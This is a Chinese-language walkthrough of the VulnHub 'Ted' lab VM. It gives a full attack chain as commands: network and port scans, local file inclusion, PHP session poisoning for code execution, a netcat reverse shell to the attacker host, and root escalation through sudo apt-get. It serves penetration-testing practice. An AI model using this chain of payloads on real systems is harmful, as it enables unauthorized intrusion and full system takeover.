本周实践的是vulnhub的Ted镜像,
下载地址,https://download.vulnhub.com/ted/Ted.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.88.0/24,
获取到靶机地址是192.168.88.135,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.135,
发现靶机仅开了80端口的http服务,
浏览器访问http://192.168.88.135,发现需要登录,
上burpsuite,随便试了一下admin/admin,
提示密码需要hash的,
在线对admin进行sha256编码,要大写的,
登录成功,发现个搜索框,
尝试搜索/etc/passwd,确认有文件包含漏洞,
获取当前访问的PHPSESSID,
搜索,/var/lib/php/sessions/sess_7ft88rucgfjumpqlloei3u9781,
在bursuite里构造新的访问提交,search的部分不变,
user_pref换成<?php system("ifconfig")?>的url编码,
确认user_pref有命令执行漏洞,
继续把user_pref换成<?php system("nc 192.168.88.131 4444 -e /bin/bash")?>的url编码,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
提交请求,kali攻击机上获取到反弹shell,
sudo -l发现/usr/bin/apt-get有root权限,
去GTFOBins搜提权方法,
执行sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh,
获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Ted的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论